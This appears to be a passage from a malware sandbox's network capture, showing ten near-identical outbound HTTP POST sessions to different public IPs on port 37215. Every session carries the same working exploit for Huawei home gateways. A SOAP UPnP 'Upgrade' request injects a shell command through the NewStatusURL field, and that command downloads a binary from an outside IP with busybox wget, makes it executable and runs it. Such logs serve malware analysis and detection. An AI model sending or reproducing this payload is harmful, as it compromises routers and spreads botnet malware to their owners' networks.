                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1017192.168.2.1534562197.113.213.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928564072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1018192.168.2.1559042121.65.42.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928571939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1019192.168.2.1548512186.73.193.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928616047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1020192.168.2.1534826102.93.169.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928616047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1021192.168.2.153609437.4.116.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928637981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1022192.168.2.154041894.100.110.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928638935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1023192.168.2.1539522190.168.164.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928683043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1024192.168.2.155016294.242.163.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928683043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1025192.168.2.1544230102.48.231.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928711891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1026192.168.2.153339894.144.111.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928711891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
